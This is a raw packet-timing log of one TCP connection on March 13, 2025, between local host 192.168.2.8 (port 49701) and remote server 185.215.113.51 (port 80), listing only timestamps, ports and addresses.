                                                                                                                                                                            Mar 13, 2025 13:34:03.985054016 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985063076 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985066891 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985093117 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985104084 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985141039 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985152006 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985166073 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985188007 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985189915 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985199928 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985260963 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985275984 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985276937 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985292912 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985305071 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985320091 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985348940 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985371113 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985383034 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985394001 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985414982 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985426903 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985438108 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985438108 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985450029 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:03.985469103 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:03.985498905 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:04.003722906 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003767014 CET4970180192.168.2.8185.215.113.51
                                                                                                                                                                            Mar 13, 2025 13:34:04.003772020 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003782988 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003793001 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003815889 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003828049 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003834963 CET8049701185.215.113.51192.168.2.8
                                                                                                                                                                            Mar 13, 2025 13:34:04.003837109 CET4970180192.168.2.8185.215.113.51